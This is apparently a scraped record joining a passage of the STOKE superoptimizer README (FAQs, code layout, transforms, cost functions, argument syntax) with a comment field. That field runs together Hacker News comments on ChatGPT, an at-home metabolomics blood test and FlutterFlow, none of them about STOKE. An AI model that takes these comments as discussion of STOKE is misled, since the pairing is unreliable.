cfg`: Measure the time required to recompute a control flow graph.\n- `stoke benchmark cost`: Measure the time required to compute a cost function.\n- `stoke benchmark sandbox`: Measure the time required to execute a program in a STOKE sandbox.\n- `stoke benchmark search`: Measure the time required to perform and undo a transformation to a program.\n- `stoke benchmark state`: Measure the time required to reset the memory of a hardware machine state.\n- `stoke benchmark verify`: Measure the time required to check the equivalence of two programs.\n\nShell completion\n-----\n\nSTOKE also comes with support for bash and zsh completion. To enable either, type:\n\n $ make bash_completion\n $ make zsh_completion\n\nUsing functions to be proposed by STOKE\n-----\nSTOKE can not only propose instructions when searching for programs, but also propose calls to a list of known functions using the `--functions` command-line argument. To decide whether these functions read any undefined state (before proposing them), we use a dataflow analysis. Sometimes, the dataflow analysis can be too imprecise, which is why STOKE allows the user to annotate dataflow information in comments. Here is an example of a function that clears the overflow flag. STOKEs dataflow analysis is too imprecise for this code.\n\n .text\n .globl clear_of\n .type clear_of, @function\n #! maybe-read { }\n #! maybe-write { %of %r15 }\n #! maybe-undef { }\n .clear_of:\n pushfq\n popq %r15\n andq $0xfffff7ff, %r15\n pushq %r15\n popfq\n retq\n\n .size clear_of, .-clear_of\n\nNote that it is enough to specify the maybe sets, as STOKE will automatically realize that the must sets need to be contained in the maybe set.\n\n\nUser FAQ\n=====\n\n### What is the different between `stoke synthesize` and `stoke optimize`?\nBoth use the same core search algorithm, but in synthesis mode, STOKE starts from the empty program and tries to find a rewrite from scratch. This is great for finding implementations that are very different than the target. In optimization mode however, STOKE starts from an initial program, usually the target. This allows STOKE to work on much longer programs (because it already starts with a correct program) and apply optimizations to that program.\n\n### `stoke replace` errors with `New function has N bytes, but the old one had M`. What does that mean?\n\nRight now, `stoke replace` has a limitation where it can only replace a function if the old implementation has at least the size (in bytes) of the new implementation.\n\nIf you still want to use `stoke replace`, and if you control the compilation of the binary, a workaround is to make the old implementation artificially larger by using the compiler flag `-falign-functions=N` for some large enough `N`, say 64. In this case, the compiler will align functions at `N` bytes, which typically requires padding the functions with `nop`s. This increases the chance of `stoke replace` to succeed.\n\nDeveloper FAQ\n=====\n\n### How does the assembler work (and how do I debug it?)\nThere is a good explanation [in the issue tracker](https://github.com/StanfordPL/stoke/issues/791#issuecomment-169783865). We also have a [script to compare how gcc and the x64asm assembler assemble an instruction](https://github.com/StanfordPL/stoke/issues/803).\n\n### How can I run STOKE in gdb?\nSTOKEs sandbox catches SIGFPEs, and thus running STOKEs search in the sandbox causes gdb to pause very often. To not have it stop for SIGFPEs (they are almost never a problem for STOKE), run this inside gdb:\n\n handle SIGFPE nostop noprint\n\nYou can enable this by default by running the following command:\n\n echo \"handle SIGFPE nostop noprint\" > .gdbinit\n\n\n\nExtending STOKE\n=====\n\nThis repository contains a minimal implementation of STOKE as described in\nthe academic papers about STOKE. Most, but not all of the features\ndescribed in those papers appear here. Developers who\nare interested in refining these features or adding their own extensions are\nencouraged to try modifying this implementation as described below.\n\nCode Organization\n-----\n\nThe STOKE source is organized into modules, each of which correspond to a\nsubdirectory of the `src/` directory:\n\n- `src/analysis`: An aliasing analysis used by the validator.\n- `src/cfg`: Control flow graph representation and program analysis.\n- `src/cost`: Different cost functions that can be used in the search.\n- `src/disassembler`: Runs objdump and parses the results into STOKE's format.\n- `src/expr`: A helper used to parse arithmetic expressions in config files.\n- `src/ext`: External dependencies.\n- `src/sandbox`: A sandbox for testing proposed code on the hardware.\n- `src/search`: An implementation of an MCMC-like algorithm for search.\n- `src/state`: Data structures to represent concrete machine states (testcases).\n- `src/stategen`: Generates concrete machine states (testcaes) for a piece of code.\n- `src/symstate`: Models the symbolic state of the hardware; only used by the formal validator.\n- `src/target`: Code to find which instruction sets the CPU supports.\n- `src/transform`: Transforms used during search to mutate the code.\n- `src/tunit`: Classes for representing a function (x86-64 code along with a name and other metadata).\n- `src/verifier`: Wrappers around verification techniques such as testing for formal validation.\n- `src/validator`: The formal validator for proving two codes equivalent.\n\nThe `tools/` directory has the code that performs application logic and reads\ncommand line arguments.\n\n- `tools/apps`: The application logic for stoke binaries\n- `tools/args`: Lists of command line arguments used by a gadget (see below).\n- `tools/gadgets`: Modules used by applications to configure internal APIs with command line arguments.\n- `tools/io`: Code to read/write certain kinds of command line arguments.\n- `tools/scripts`: Where we put stuff when we don't have a better place. Nothing to see here.\n- `tools/target`: Arbitrarily named directory with code to read CPU features from cpuinfo.\n\nGadgets\n-----\n\nThe stoke codebase is setup in a very modular way. We have components like the\n`Sandbox`, which emulates execution of a rewrite on hardware. Or, we have\nsubclasses of `CostFunction` which evaluate the quality of a rewrite. Or, we\nhave an `SMTSolver` which is used by the formal validator to query a backend\nlike Z3 or CVC4. \n\nOften, several stoke applications will wish to configure one of these modules\nin the same way, depending on command line arguments. Thus, we have \"Gadgets\".\nA \"Gadget\" is a subclass of the class you wish to configure which takes care of\nextracting all the appropriate command line arguments. Some Gadgets, like\n`SandboxGadget` just define a constructor so that modifies the object's\nconfiguration. More involved ones, like `CostFunctionGadget` actually do work\nto create a new `CostFunction` object and define methods that act as a wrapper.\n\nTherefore, if you want to add a command line option to an existing component of\nstoke, you normally are going to want to modify the gadget for that component\nin `tools/gadgets` and add the argument in `tools/args`. Once you do that, it\nshould show up uniformly in all of the stoke tools that use that module.\n\nInitial Search State\n-----\n\nInitial state types are defined in `src/search/init.h` along with an additional\ntype for user-defined extensions.\n\n```c++\nenum class Init {\n EMPTY,\n ZERO,\n TARGET,\n PREVIOUS,\n\n // Add user-defined extensions here ...\n EXTENSION\n};\n```\n\nInitial state is specified using the `--init` command line argument which controls the initial values\ngiven to the current, lowest cost, and lowest cost correct search states. This value\naffects the behavior of the `Search::configure() const` method, which\ndispatches to the family of `Search::configure_xxxxx() const` methods. User-defined\nextensions should be placed in the `Search::configure_extension() const` method,\nwhich can be triggered by specifying `--init extension`.\n\n```c++\nvoid Search::configure_extension(const Cfg& target, SearchState& state) const {\n // Add user-defined logic here ...\n\n // Invariant 1: Search state should agree with target on boundary conditions.\n assert(state.current.def_ins() == target.def_ins());\n assert(state.current.live_outs() == target.live_outs());\n\n assert(state.best_yet.def_ins() == target.def_ins());\n assert(state.best_yet.live_outs() == target.live_outs());\n\n assert(state.best_correct.def_ins() == target.def_ins());\n assert(state.best_correct.live_outs() == target.live_outs());\n\n // Invariant 2: Search state must be in a valid state. This function isn't on\n // a critical path, so this can safely be accomplished by calling\n state.current.recompute();\n state.best_yet.recompute();\n state.best_correct.recompute();\n\n // Invariant 3: Search state must agree on first instruction. This instruction\n // must be the label definition that appears in the target.\n assert(state.current.get_code()[0] == target.get_code()[0]);\n assert(state.best_yet.get_code()[0] == target.get_code()[0]);\n assert(state.best_correct.get_code()[0] == target.get_code()[0]);\n\n // See Search::configure for additional invariants\n}\n```\n\nSearch Transformations\n-----\n\nTransformation types are defined in the `src/transform` directory. Each\ntransform is a subclass of the abstract class `Transform`. Existing transforms are,\n\n| Name | Description |\n| ---- | ----------- |\n| add_nops | Adds one extra nop instruction into the rewrite. |\n| delete | Deletes one instruction at random. |\n| instruction | Replaces an instruction with another one chosen at random. |\n| opcode | Replaces an instruction's opcode with a new one that takes operands of the same type. |\n| operand | Replaces an operand of one instruction with another. |\n| rotate | Formerly \"resize\". Moves an instruction from one basic block to another, and shifts all the instructions in between. |\n| local_swap | Takes two instructions in the same basic block and swaps them. |\n| global_swap | Takes two instructions in the entire program and swaps them. |\n| weighted | Selects from among several other transforms at random. |\n\n\nThese subclasses each implement `operator()(Cfg& cfg)` to mutate a Cfg. This\nfunction returns an object, `TransformInfo` that contains all the information\nneeded to undo this transformation, and also whether the transform succeeded\n(transforms are allowed to fail). It's common for this object to be set with\nindexes of instructions in the code that were modified, for example. The\nsubclass also implements `undo(Cfg& cfg, TransformInfo ti)`.\n\nTransforms will often want to select from a collection of operands and opcodes,\nand for this purpose they can access the `pools_` protected variable of the\nTransform` superclass. This is of type `TransformPools` and allows access to\nthese collections. This makes it possible to configure the collection of\navailable opcodes and operands independently of the transforms. Also, the\n`Transform` superclass has a `gen_` member which is used to produce random\nnumbers with a known seed.\n\nTransformation weights are specified using the family of `--xxxxx_mass` command\nline arguments. These values control the distribution of proposals that are\nmade by the WeightedTransform, which is the transform used by the\nsearch.\n\nA simple example of how to impelement a transform is in\n`src/transform/global_swap.cc`. Note that all transforms must appropriately\nmake a call to recompute any `Cfg` information that needs to be updated and\nensure that `cfg.check_invariants()` returns true when done (you can assume it\n returns true at the beginning of the function).\n\nCost Function\n-----\n\nA cost function is specified using the `--cost` command line argument. It's an\nexpression composed using standard unsigned arithmetic operators. As\nvariables, you can use several measurements of the current rewrite. The most\nimportant of these is `correctness`. The value `correctness` is (by default)\nthe number of bits that differ in the outputs of the target versus the rewrite\nsummed across all testcases. There are some tunable options for this, for\nexample, for floating point computations. In all cases, lower cost is better.\n\nSome other important cost-variables you can use are:\n\n| Name | Description |\n| ---- | ----------- |\n| binsize | The size (in bytes) of the assembled rewrite using the x64asm library. |\n| correctness | How \"correct\" the rewrite's output appears. Very configurable. |\n| size | The number of instructions in the assembled rewrite. |\n| latency | A poor-man's estimate of the rewrite latency, in clock cycles, based on the per-opcode latency table in `src/cost/tables`. |\n| measured | An estimate of running time by counting the number of instructions actually executed on the testcases. Good for loops and algorithmic improvements. |\n| sseavx | Returns '1' if both avx and sse instructions are used (this is usually bad!), and '0' otherwise. Often used with a multiplier like `correctness + 1000*sseavx` |\n| nongoal | Returns '1' if the code (after minimization) is found to be equivalent to one in `--non_goal`. Can also be used with a multiplier. |\n\nIn typical usage, you will combine the value of `correctness` with other values\nyou want to optimize for. A good starting point is `correctness + measured` or\n`correctness + latency` (the latter being default). Improvements might assign\nan SSE-AVX penalty, like `correctness + latency + 10000*sseavx`.\n\nTo add a new cost function, drop a file into `src/cost` that subclasses\n`stoke::CostFunction`. Look at `src/cost/sseavx.h` for a simple example. It\ncomes down to overloading the `operator()` function to return the value you\nwant. Look at `measured.h` for an example of how to use runtime data from the\nsandbox to generate values. Then, add an entry to the map in\n`tools/gadgets/cost_function.h` so that your new function can be found on the\ncommand line.\n\nLive-out Error\n-----\n\nLive-out error measurement types are defined in `src/cost/distance.h` along with an additional type for user-defined extensions.\n\n```c++\nenum class Distance {\n HAMMING,\n ULP,\n\n // Add user-defined extensions here ...\n EXTENSION\n};\n```\n\nMeasurement type is specified using the `--distance` command line argument.\nThis value controls the behavior of the `CorrectnessCost::evaluate_distance()\nconst` method, which dispatches to the family of\n`CorrectnessCost::xxxxx_distance() const` methods, each of which represent a\nmethod computing the distance between 64-bit values. User-defined extensions\nshould be placed in the `CostFunction::extension_distance() const` method,\nwhich can be triggered by specifying `--distance extension`.\n\n```c++\nCost CostFunction::extension_distance(uint64_t x, uint64_t y) const { \n Cost res = 0;\n\n // Add user-defined implementation here ...\n\n // Invariant 1: Return value should not exceed max_error_cost\n assert(res <= max_error_cost);\n\n return res; \n}\n```\n\nVerification Strategy\n-----\n\nThe verification strategy specifies what kind of verification to do on the\nrewrite. It's controlled using the `--strategy` command line argument. Right\nnow, the options are 'hold_out', 'straight_line' or 'bounded'.\n\nCommand Line Args\n-----\n\nCommand line arguments can be added to any of the STOKE subcommands using the\nfollowing syntax. Argument separators which are printed as part of help\nmessages are specified by defining a heading variable:\n\n```c++\nauto& heading = Heading::create(\"Heading Description:\");\n```\n\nCommand line flags are specified by declaring a `FlagArg`.\n\n```c+++\nauto& flag = FlagArg::create(\"flag_name\")\n .alternate(\"alternate_flag_name\")\n .description(\"What this flag does\");\n```\n\nAny of the built-in c++ primitive types are specified by declaring a `ValueArg`.\n\n```c++\nauto& val = ValueArg::create(\"value_name\")\n .alternate(\"alternate_value_name\")\n .usage(\"\")\n .description(\"What this value represents\")\n .default_val(0);\n```\n\nUser-defined types are specified by additionally providing function objects that define I/O methods.\n\n```c++\nstruct T {\n int x, y, z;\n};\n\nstruct Reader {\n void operator()(istream& is, T& t) const {\n is >> t.x >> t.y >> t.z;\n }\n};\n\nstruct Writer {\n void operator()(ostream& os, const T& t) const {\n os << t.x << \" \" << t.y << \" \" << t.z;\n }\n};\n\nauto& val = ValueArg::create(\"value_name\")\n .alternate(\"alternate_value_name\")\n .usage(\" \")\n .description(\"What this value represents\")\n .default_val({0,0,0});\n```\n\nFor complex values that are better suited to being read from files, a `FileArg`\nmay be more appropriate than a `ValueArg`. The syntax is identical.\n\n```c++\nauto& val = FileArg::create(\"value_name\")\n .alternate(\"alternate_value_name\")\n .usage(\"\")\n .description(\"What this value represents\")\n .default_val(Complex());\n```\n\n\nContact\n=====\n\nQuestions and comments are encouraged. Please reach us through the GitHub issue tracker, or alternatively at `stoke-developers@lists.stanford.edu`.\n", "readme_type": "markdown", "hn_comments": "ChatGPT knows that it is a ChatGPT because it was programmed to know this. See:https://scottaaronson.blog/?p=6990#comment-1945915> I was eyeball-deep in analytic philosophyThen you should be aware (and the rest of your comment implies you are) that> does it 'know' [...] that it is writing the screenplay?hangs on a there being a reasonable interpretation of \"know\" in the case of LLMs.\"Know\" is often used as a kind of shorthand in the case of inanimate objects: \"the website knew I was using Internet Explorer so it sent me the javascript workarounds\", \"the thermostat knew the temperature had reached the target so it switched the boiler off\" - perhaps shorthand for 'P was causally dominant in machine behaving like so' becoming 'machine behaved like so because it knew that P'.I think \"ChatGPT knows who directed Lost Highway because it answered 'David Lynch' when I asked it\", \"ChatGPT knows that Hitler is a touchy subject so it refused to write a review of Mein Kampf\" and so on are similar in their ascription of 'knowledge' to ChatGPT.In the same way that the thermostat is engineered to turn off the boiler when the target temperature is reached, ChatGPT is engineered to make linguistic productions that accord with its design goals, including being factually correct on matters of general knowledge and avoiding toxicity, the corpus and training providing the means of achieving these goals.Taking the above on board, ChatGPT's \"knowledge\" of indexicals doesn't seem any different from its \"knowledge\" of David Lynch or Hitler. The statistical relations instilled by its training make it likely to use indexicals in a way that conforms to the conventional human use of them: it 'knows' how to use indexicals.There's also a different reading of your question: \"is ChatGPT programmed specifically to take account of self-knowledge - is this special-cased in code or training?\" (which I guess it may be, since it seems informed about itself despite its training corpus dating only up to 2021). But while this may be an interesting programmer question it seems philosophically inert; either way, we're still talking about engineered thermostat knowledge.Maybe a more interesting question: what distinguishes the knowledge in \"I (as a non-LLM human - trust me!) know that David Lynch directed Lost Highway\" from the 'inanimate knowledge' exhibited by thermostats, websites, and ChatGPT?I'm crap at language. But if you told ChatGPT: \"Have Ron write a screenplay\" (or variations thereof), would it still output a screenplay or facsimile?Does this philosophical question exist for hand calculators? They accept input and \"personally\" respond to it appropriately too.To personify: What's the speaker-status of a person speaking echolalia?To religify: What's the speaker-status of the oracle at delphi, or a person overcome by the holy spirit who starts speaking in tongues?At the end of the day it's complex mathematical algorithms making predictions about the next word in a sequence of words, based on all the sequences of words it's learned from (snapshot of the web). It turns out that given a sufficient amount of properly labeled data the algorithms can build a model that makes good predictions, thus we finally have a useful chat bot.While the user experience feels magical, it's helpful to understand what is actually under the hood to put it into perspective.I would like to believe this is possible but it reeks of snake oil and scientism, much like microbiome nonsense that was in vogue a few years ago.Clicked through with intent to buy. Abandoned on recurring charge and too many offerings.This sounds like the pitch I got from a friend who drank the Theranos kool-aid.I was interested in signing up, but then saw that you get raw data for metabolites only with the $160/month plan.This seems as if it costs you actually $0 to provide since you have that data as a prerequisite for doing anything. Why would you not provide that for every plan?Also \"get basic tips\" on the lowest cost plan doesn't provide enough information to know whether it will be anything interesting or usable.I\u2019d love to try this on a regular basis. If I am travelling internationally and have my US mail forwarded to me, my concern would be a long return time for international mail. Is there a time limit in which you must receive the sample back?In 2013 FDA shut down 23andMe's direct-to-consumer reports because they said consumers would misunderstand genetic information and \"self treat\". FWIW I thought this was a dumb decision and feel lucky that I was grandfathered in to some helpful reports before the FDA put the kibosh on them.Do you think this is a risk to you? How will you deal with the FDA?> At no time shall your Personal Information, including blood or metabolomic data collected from you in accordance with this Privacy Policy be deemed to be an electronic health record or an electronic medical record for any purpose, including without limitation for the purpose of compliance with the Health Insurance Portability and Accountability Act of 1996.Does this mean you other medical professionals can't get the data / records of these tests?Great idea. Huge longevity freak here. But why are you developing two things? 1. the blood extractor and 2. the test data processing. Seems like the blood extractor is way riskier/complex and unnecessary part of the main point. Unless your main point is blood extraction for numerous other tests.As I watch younger people struggle with basic stuff I think getting old is not so bad and I wish people weren\u2019t so afraid of it.Then I get out of a chair on a bad day and make grandpa noises.I think if someone invented medical tech to repair and prevent joint injuries, and to retain cardiac function, I would sign up for those and boycott the rest.I don\u2019t need to live forever. I\u2019m pretty sure I don\u2019t have the stamina for it. I don\u2019t think most of the rest of us do either. I stopped reading Ann Rice before Armand, but if you ignore the other weird stuff, that\u2019s practically the main thesis of the books. People think they have the stamina for forever. Anyone who actually does is very very special.Blue Mars and Green Mars dip into this too, but also consider Progress instead of the supernatural. Sometimes people have to step aside for new ideas to flourish.Do you estimate the analyte levels and then use those to calculate your summary statistics (bio age, polyamines level, etc) or do you estimate the summary stats directly from the spec data?Very cool! Are you a wrapper for Metabolon - e.g. are they doing the untargeted work or do you all have your own LCMS farm? If you ever get interested in adding a microbial metabolites angle to this drop me a line.Do you think the subscription value proposition in your lower tier offers compelling value to consumers? What research have you done to make ensure your pricing tiers are market-appropriate?Congratulations on launch!You are using established lab gear and existing research on metabolites, which helps establish credibility. So you have first mover advantage in that you have learned HIPPA compliance and will be first for FDA approval.If this product was a huge success, is the thing that would make it difficult for copycats your ML-based data analysis software?Lots of ppl have sensitive data, but, what could you say to customers that would give them cybersecurity comfort?The idea certainly excites me.Given the possibility that some findings might lead to the need for medication, are you going to have MDs or PAs or whoever on staff who can prescribe those?For metabolites found in very low concentrations where draw-to-draw variance is high, how do you deal with that when a person is only sending you one sample at a time?Is there ever going to be any effort to have this payable by health insurance?Are you doing anything with the feedback data? As in, someone sends you a sample, you tell them to make a behavioral change, does your advice change if future samples don't show a positive intervention effect? How do you know if patients comply with your recommendations?Are you going to offer genetic testing so, say, someone with high LDL or whatever can know if that's due to diet or they just lost the genetic lottery and nothing but statins can possibly help them?I think LDL is not a metabolite but since your \"what's measured\" page ends with \"more published below\" and then there is nothing below, I'm not sure what the full extent is of what you're testing for. If not LDL, presumably something you're testing for can have many sources, including genetic propensity, diet, and other environmental factors. How do you determine which of those is most causally relevant before prescribing an intervention?Some bits of the website really set off my alarm bells.Having Stanford Medicine and Cornell University logos front and center on the landing page gives the impression that these organizations endorse the product. I know it says, \"made by scientists from\" right there, but still. It gives me the impression you want to trick me into thinking you're actively affiliated with these institutions.The example advice of \"avoid bell peppers and consider adding arugula\" strikes me as unrealistically precise. I am skeptical that there's really research to support that narrow of a recommendation. Under what circumstances does a patient truly need to be told to avoid bell peppers for medical reasons?\"Vitamin D - insufficient, view our recommended brands\" makes me think this is a vector to push supplements on people under the guise of personalized recommendations. Do people really need a recommended brand of Vitamin D? How many supplements are you recommending people take?\"Also, only 15% of age-related diseases are genetic. The other 85% are related to your blood metabolome.\" Is that really true, that there are zero age-related diseases that are neither genetic nor \"related to your blood metabolome\"?\"use state-of-the-art AI to create your personalized health report and recommendations.\" Any time someone tells me they use \"state of the art\" AI, I assume it's a scam. How do you even measure that? Is there a standard benchmark for metabolome-based personalized health report generation?The overall idea seems perfectly reasonable, but this website gives me the heebie-jeebies.This sounds very interesting and I am tempted to sign up. But the biggest worry for me is the privacy of the data. There is a mention on the website that data isn't shared without consent. But that can always change in the future once VCs get involved and they are trying to maximize revenue. Or the business model changes.References:[1] Wishart DS. Metabolomics for Investigating Physiological and Pathophysiological Processes. Physiol Rev. 2019 Oct 1;99(4):1819\u201375. https://journals.physiology.org/doi/full/10.1152/physrev.000...[2] Wishart DS, Tzur D, Knox C, Eisner R, Guo AC, Young N, et al. HMDB: the Human Metabolome Database. Nucleic Acids Res. 2007 Jan;35(Database issue):D521-526. https://academic.oup.com/nar/article/35/suppl_1/D521/1109186[3] Wishart DS. Current progress in computational metabolomics. Brief Bioinform. 2007 Sep;8(5):279\u201393. https://academic.oup.com/bib/article/8/5/279/217981[4] Nordstr\u00f6m A, O\u2019Maille G, Qin C, Siuzdak G. Nonlinear data alignment for UPLC-MS and HPLC-MS based metabolomics: quantitative analysis of endogenous and exogenous metabolites in human serum. Anal Chem. 2006 May 15;78(10):3289\u201395. https://pubs.acs.org/doi/10.1021/ac060245f[5] Wishart DS, Guo A, Oler E, Wang F, Anjum A, Peters H, et al. HMDB 5.0: the Human Metabolome Database for 2022. Nucleic Acids Research. 2022 Jan 7;50(D1):D622\u201331. https://academic.oup.com/nar/article/50/D1/D622/6431815[6] Ahadi, Sara, et al. \"Personal aging markers and ageotypes revealed by deep longitudinal profiling.\" Nature Medicine 26.1 (2020): 83-90. https://www.nature.com/articles/s41591-019-0719-5[7] Pietzner, Maik, et al. \"Plasma metabolites to profile pathways in noncommunicable disease multimorbidity.\" Nature medicine 27.3 (2021): 471-479. https://www.nature.com/articles/s41591-021-01266-0[8] Merino, Jordi, et al. \"Metabolomics insights into early type 2 diabetes pathogenesis and detection in individuals with normal fasting glucose.\" Diabetologia 61.6 (2018): 1315-1324. https://pubmed.ncbi.nlm.nih.gov/29626220/[9] Wang, Thomas J., et al. \"Metabolite profiles and the risk of developing diabetes.\" Nature medicine 17.4 (2011): 448-453. https://www.nature.com/articles/nm.2307How stabile is your \"biological age\" stat? Is this more like blood glucose (can change dramatically in minutes) or A1C (takes weeks to move significantly) or is it even more stable than that? Said another way: In the extreme case where you had a subject that was chrono_age = 60yrs and bio_age = 70yrs and they were perfectly compliant to your recommended interventions, how fast could you get the bio_age measure down to 50yrs?We\u2019re developing an at-home metabolomics test that measures hundreds of \u201cmetabolites\u201d in blood, which studies have shown can inform about health status, disease risk, dietary patterns, and physical activity.Just for my own clarification, when you say at-home do you mean that the kit will diagnose the patient at home, or that they will gather samples at home and mail them to you?Pricing is too steep to pull the trigger on something so novel and whose utility, quality, and accuracy won't be obvious (or not) until a few tests are done. I'm not sure how to solve this other than to lower them for early adopters while you establish your brand and reputation.Hi guys, first great effort and as someone who worked in a metabolomics lab I know how amazingly sensitive and rich the information one can gather even from a small amount of blood.That said, the million dollar question you have to answer in healthy persons is \"how is this better than normal lab tests? (CBC, CMP, TSH, UA)?\" For example regarding diabetes - there is HbA1c and microalbuminuria, both of which can detect abnormal glucose years before diabetes and prevent it.If you can prove that these tests add value to the battery of already very cheap and ubiquitous tests, then you will have widespread adoption.Clinical metabolomics is a very nascent field and best of luck to you!Couple of questions:- Do you have an example of what a report looks like?- What's your turnaround time?- Do you have an option to do one test if we're unsure we want to commit to a year?- Can we do anonymized user information from the start, ie not providing name, address, etc (given recent supreme court decisions, it's not off the table that one day insurance companies would be allowed to access this data)The HNLAUNCH promo code is showing as invalid for me.Pity this is US only; Any idea when/if it will be available in Europe? I'm in Germany.Do you have concerns about over-diagnosis, turning people in patients unnecessarily? Can this information creating outsized worry and psychological impacts that exceed the potential problem that may or may not eventuate? In the US I imagine there are also insurance implications.> Moreover, every bit of information that we communicate to the users will be heavily backed by scientific evidence which we disclose in the delivered reports.Will it be possible to contact people with similar profiles to create new scientific evidence? E.g. if some marker is too low, it would be nice to work with others with the same problem to figure out how to increase the value.Congratulations on the launch.Why 1, 3, 6, or 9 tests per year? (Seems odd considering 52 weeks, or 12 months for periodicity. Only 6 divides into 12. Maybe 1, 2, 4, 6, and 12?)> 30-min call with Stanford/Cornell scientist to go through results9 times, or once? I have seen other industries (e.g financial, hotel, airline) attempting to sell 'high touch' service as an upgrade. I have yet to see one that is worthwhile or is profitable.> Integration with wearables and diet tracking appsCan you describe what wearables and what diet tracking apps?As others have asked, a sample report would be lovely.> You must live in the US, be 18 years or older, and not pregnant to be participate.I think you are looking for 'Have US address'. Or, you are looking for US address and US funds?I have a question based on what you said here:> one of our participants had a high level of phthalic acid, which can be found in plastics and cosmetics and is a chemical known to disrupt hormones in the bodyDoes this mean that if elevated levels of some weird metabolite are found in my blood, you'll let me know? You say you measure 600 of them - does that mean you check for weird/high levels of all 600, and if you find some, they'll be in the report?Congrats on the launch! We need more folks trying to bring the tricoder to reality. I knew about DNA-methylation but this novel way seems more apt for scale.\" We identified 420 metabolites...\" heh heh.Love the title. \"take this blood test and extend your healthy lifespan.\" Sure dudes! Good luck with that.Can I bill this to an HSA?This looks awesome! I recently did a 2x/mo metabolomics experiment (https://smm-data.herokuapp.com/) and I've been wishing someone would do something like this ever since.Best of luck!Am a doctor. Have a question. What\u2019s the evidence base you\u2019re planning to use in justifying the treatment and recommendations?There\u2019s often a big divide in things that make sense to treat, and things that should actually be treated. In other words, with what studies will you know if the effect is clinically significant or not?Not wanting to be antagonistic. Genuinely curious.This is exciting technology. Something I want but that does not exist is being able to test your blood with your own personal device without sending any of the data or blood over to private corporations. The corporations only sell the software.You'd be able to download different programs that analyze your current health state from blood, or any other marker. The device would be able to tell if you are at risk for any disease just from a common set of samples.I know this is kind of unrealistic, because to make better programs you need data from people. But who knows. Maybe one day we'll get there.Shame not available in UK to try outI would love to see this in combination with mental health. Dopamine, Serotonin and Cortisol are excellent trackers for this purpose.1) Providing raw data at the lowest plan would evince more interest. It would not cost you any more.Also, the plan should allow for ad-hoc testing at a slightly lower price as a repeat customer.This way, I might set a baseline, and after I go through a bout of illness, I can measure myself incrementally.2) A page with markers you provide related to a specific condition would be helpful, for example, I am genetically disposed to heart disease, and would like to keep track of those that can impact it.Medical epidemiologist here. This has such a Theranos ring to it. No response to the questions about the evidence base for claims of new predictive insights - only references to studies that provide prediction and guidance based on currently available routine blood workups and common dietary interventions. Everything \"new\" appears to be speculative and to come (perhaps) from insights based on longitudinal data collection.As I read this it is hoped that the technology will provide new predictive disease insights but these are not established yet. So many metabolic/biochemical screens have poor prediction at the individual level.If I have misunderstood can you cite one NEW predictive insight your technology provides with some kind of performance parameter - predictive value positive, 10 year incidence, or receiver operating curve performance?Couple of years ago I was part of a pre-accelerator group assessing the product market fit for independent assessment of new medical technologies. The consultation revealed that most investors in new medical technologies had no idea how to evaluate the technology, didn't know they they didn't know how to assess the technology, and didn't want to pay someone else to do it.\"Your personal rate of aging. Research has shown that there is a \u201cbiological age\u201d, which might differ from a person\u2019s actual, chronological age. People who are biologically older than their real age tend to develop more health-related issues and age-related problems compared to people who are biologically young. Our platform will provide the users with estimates of their biological age, as well as their personal rate of aging across repeated time points and potential recommendations to slow down this rate.\"I question whether it's emotionally healthy for all users to have a direct measure of their aging to this degree. If I were a customer, I'd prefer to receive the actionable advice (the \"how to decrease this rate of aging\") without knowing the exact rate or my rate relative to the average. Especially if there were aspects outside of my control. If some other thing shows up as actionable but there's not really much in the metabolite data relevant to aging rate, cool - show me that stuff instead. If the data does show there are actions that I should take to reduce rate of aging, cool - recommend me those actions.Certainly not saying one shouldn't be able to get at this data from your service, but that perhaps it should be an onboarding option to not receive that level of granularity.Is \"Iollo\" pronounced like \"YOLO\"?I\u2019d love this if it came to CanadaHow comfortable do you feel making these kinds of recommendations?I feel like during my lifetime overall nutritional guidance has swung on plenty of things. One example would be eggs - \"those are good for you, no wait they're bad and drive up your cholesterol, no wait, the cholesterol in eggs doesn't seem to raise cholesterol in humans who consume eggs\".I can see where you'd feel you have an edge by measuring each individual's blood over time and you can see how test results change after making changes in diet or behavior - except maybe you aren't factoring in so many other changes. Maybe I moved somewhere colder and I'm getting less sunlight. Maybe I got COVID. Maybe I took up swimming. Ok, so now a blood test is showing that I'm at a slightly higher risk for a disease - do I follow Iollo's dietary guidance? Do I try to get more Vitamin D? Do I just write it off as noise?Do you have published research demonstrating that the sample collection process (and the 80uL specifically) is sufficiently precise to detect and quantify these metabolites into clinically meaningful ranges? This was the core problem with Theranos IIRC. I've quickly reviewed your sources below and they seem to be related to the clinical value of metabolites, I haven't seen one describing precision of the device itself.I see you mention Theranos, but to be honest, this won't be the last time you get asked these questions. Every partner, news interview, and many potential customers will bring it up. So much so, that I would create a page specifically addressing these issues (in more detail than the FAQ).Congratulations on the launch! I've always been fascinated by metabolomics, but it felt like such a complex data problem. What sort of recommendations will you make based on my results? How did you develop the recommendations?How can consumers feel confident that the insights they're getting are backed by legitimate research? (In other words, how are you escaping the perception that this is Theranos 2.0?)I've been trying to use this product for a personal app I'm making. its really good until its not. There needs to be better controls for mock data in listviews, I don't want to hook up to API in the tool, I have my own data, but I need the listview to aleast pretend theres data there.Also the lack of positioned widgets in conjunction with stack views makes it hard to transfer the flutterflow experience to the actual app. What happens if I want anchor a view to the bottom of the screen in a stack? I cant without positioned widget. Imagine I have this view https://github.com/o1298098/Flutter-Movie/blob/master/srceen... and I want the bottom white part to be the \"top\" of the stack. This image isnt the best example because the poster is the entire background, imagine instead I had a column and I wanted to stack the bottom white card over it.These kind of details make me have to abandon a almost perfect tool, but its utility is not quite 100% that is causes me to have to throw it all out.I really wish I could use this tool with all the native widget, not just some.Beautiful product!As the saying goes, the best \"enterprise\" products are borne out of frustration you experience while trying to build your own consumer product - sounds like this was exactly how you landed on FlutterFlow :-)The example app doesn\u2019t work on latest iOS Safari on iPhone SE 2020. After 2 long loading screens you can progress through the app until you need to pick categories, but that screen is unscrollable, so you\u2019re stuck. Trying to go back breaks navigation and dumps you on a login page after a while.Flutter. Remember, it exists so Google can ram more ads and tracking down our throats (and eventually replace HTML and an open web).Don't use it.Is Flutter still a promising bet? Haven't heard much about it lately, but in principle I find it very interesting.Edit: wow, I am surprised, according to statista it is the most popular mobile cross platform framework (roughly on par with React Native): https://www.statista.com/statistics/869224/worldwide-softwar...I want visual basic style UI builder for flutter but still want to code the business logic. Is that what this can do?I was a beta tester for Flutter Flow. While I didn't end up publishing an app, (Product-market fit wasn't where we wanted and we pivoted hard where an app wasn't needed), myself and coworkers went through a few iterations using it and really enjoyed my experience. The code export feature and overall business model make this a really great and fair tool for small development teams.Congrats on the launch and best of luck folks!This looks great. I signed up for a free 